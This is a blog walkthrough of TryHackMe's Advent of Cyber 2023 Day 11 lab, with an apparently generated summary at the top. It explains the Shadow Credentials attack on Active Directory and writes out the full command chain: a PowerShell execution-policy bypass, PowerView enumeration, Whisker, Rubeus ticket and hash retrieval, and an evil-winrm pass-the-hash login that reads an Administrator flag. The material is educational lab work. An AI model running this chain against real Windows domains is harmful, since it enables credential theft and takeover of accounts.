Summary

The web content describes Day 11 of TryHackMe's Advent of Cyber 2023, focusing on Active Directory and the Shadow Credentials attack, including practical steps to exploit a vulnerability using tools like PowerView, Whisker, and Rubeus, and concludes with a Pass-the-Hash attack to access a flag.txt file.

Abstract

Day 11 of TryHackMe's Advent of Cyber 2023 event delves into Active Directory security, specifically the concept of Shadow Credentials attacks. Participants learn about Windows Hello for Business and the prerequisites for exploiting GenericWrite privileges. The article provides a step-by-step guide on how to use PowerView.ps1 to identify vulnerable users with GenericWrite permissions, and then exploit these vulnerabilities using Whisker and Rubeus tools to perform a Shadow Credentials attack. This involves overwriting a user's public key to impersonate them and gain unauthorized access. The guide concludes with a practical example of using the obtained credentials to perform a Pass-the-Hash attack and access sensitive information, such as the content of flag.txt on the Administrator's Desktop.

Opinions

The article positions the Advent of Cyber 2023 event as an educational opportunity to understand complex cybersecurity concepts like Active Directory and Shadow Credentials attacks.
It suggests that the content is suitable for learners with some prior knowledge, as the techniques discussed are technical and involve advanced concepts such as GenericWrite permissions and Windows Hello for Business.
The author implies that the exercises are a good introduction to Microsoft Windows technologies, which are widely used in corporate environments, thus emphasizing the practical relevance of the learning material.
By providing a detailed walkthrough, the author conveys a helpful and informative tone, encouraging readers to engage with the content and reach out with questions.
The article concludes with a call to action, inviting readers to show appreciation for the post by clapping and following for more cybersecurity content, indicating the author's interest in building a community and sharing knowledge.

TryHackMe — Advent of Cyber 2023: [Day 11] Active Directory: Jingle Bells, Shadow Spells

Day 11 of TryHackMe’s Advent of Cyber 2023 has been launched.

Link: https://tryhackme.com/room/adventofcyber2023

Learning Objectives

Understanding Active Directory
Introduction to Windows Hello for Business
Prerequisites for exploiting GenericWrite privilege
How the Shadow Credentials attack works
How to exploit the vulnerability

Answer The Questions

What is the hash of the vulnerable user?

From the Target machine, run powershell -ep bypass to run bypass the Execution Policy to load the PowerView.ps1 into the memory. Once the script loads, run the following command:

Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

We can see the user has GenericWrite permission over vansprinkles, which we can leverage to exploit Shadow Credentials attack.

Shadow Credentials Attacks

As mentioned above, hr user has GenericWrite permission over vansprinkles user, which we can overwrite his/her msDS-KeyCredentialLink.

msDS-KeyCredentialLink is an attribute used by the Domain Controller to store the public key in WHfB for enrolling a new user device (such as a computer). In short, each user object in the Active Directory database will have its public key stored in this unique attribute.

So with the Shadow Credentials attacks, we override vansprinkles' public key with hr's public key, making the computer think we’re vansprinkles.

To do this, we use the tool Whisker.exe: whisker.exe add /target:vansprinkles

Now we have the certificate to impersonate vansprinkles, we can run Rubues to get the user’s hash and continue further exploitation.

Whisker also printed out a command that can be used with Rubeus so we just need to copy and paste.

Rubeus.exe asktgt /user:vansprinkles /certificate:MIIJuAIBAzCCCXQGCSqGSIb3D[snip] /p      assword:"kdZd2sxZquQ5DDT9" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show

asktgt this will make a request to obtain the TGT /user the user we want to impersonate for the TGT /certificate the certificate generated to impersonate the target user /password the password used for decoding the certificate since it's encrypted /domain the target Domain /getcredentials this flag will retrieve the NTLM hash, which will be used in the next step /dc the Domain Controller that will generate the TGT

Answer: 03E805D8A8C5AA435FB48832DAD620E3

What is the content of flag.txt on the Administrator Desktop?

Now that we get the user’s hash, we can use Pass-The-Hash to log in as the user vansprinkles. We will Evil-Winrm on our attacking machine with the following syntax: evil-winrm -i $TARGET_IP -u $USER -H $HASH

evil-winrm -i 10.10.86.84 -u vansprinkles -H 03E805D8A8C5AA435FB48832DAD620E3

Read the flag.txt file on Administrator’s Desktop:

cat C:\Users\Administrator\Desktop\flag.txt

Conclusion

That is it for the room. It is a little technical for beginners who has no knowledge of how Pass-the-Hash attacks and windows Directory. However, it is a nice introductory excercise to get familiar with these technologies used by Microsoft Windows, which occupies 80% of corporations. Feel free to contact me if you have any question.

If you like my post, please give it a clap and follow for more Cybersecurity content.